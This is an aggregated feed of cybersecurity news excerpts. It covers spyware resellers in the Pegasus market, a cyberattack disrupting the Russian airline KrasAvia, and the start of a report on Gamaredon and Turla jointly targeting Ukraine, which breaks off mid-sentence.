    This sophisticated defensive posture ensures that samples submitted for analysis often remain dormant, preventing researchers from understanding their true capabilities and attribution markers.

    The research demonstrates how resellers and brokers create misleading contractual structures that obscure both the genuine products being sold and their original vendors, as documented in official Mexican government transparency releases regarding NSO Group’s Pegasus distribution network.

    These intermediaries distort pricing mechanisms for exploits and capabilities while connecting vendors to new regional markets, creating enforcement challenges that undermine international accountability efforts.

    The systematic documentation of this marketplace provides crucial intelligence for policymakers seeking to address the proliferation of surveillance technologies that threaten democratic institutions and human rights defenders worldwide.


    The post Global Spyware Markets to Identify New Entities Entering The Market appeared first on Cyber Security News.


  • Russian regional carrier KrasAvia is grappling with a major IT outage after what appears to be a cyberattack. Passengers have been unable to buy tickets online, and flight operations have been forced to switch to manual procedures. The airline confirmed the disruption to local media but has not provided a timeline for restoring normal service. […]

    The post Russian Airline Hit by Cyberattack, Website and Systems Disrupted appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


• Cybersecurity researchers have uncovered evidence of two Russian hacking groups, Gamaredon and Turla, collaborating to target and compromise Ukrainian entities. Slovak cybersecurity company ESET said it observed the Gamaredon tools PteroGraphin and PteroOdd being used to execute Turla’s Kazuar backdoor on an endpoint in Ukraine in February 2025, indicating that Turla is very likely
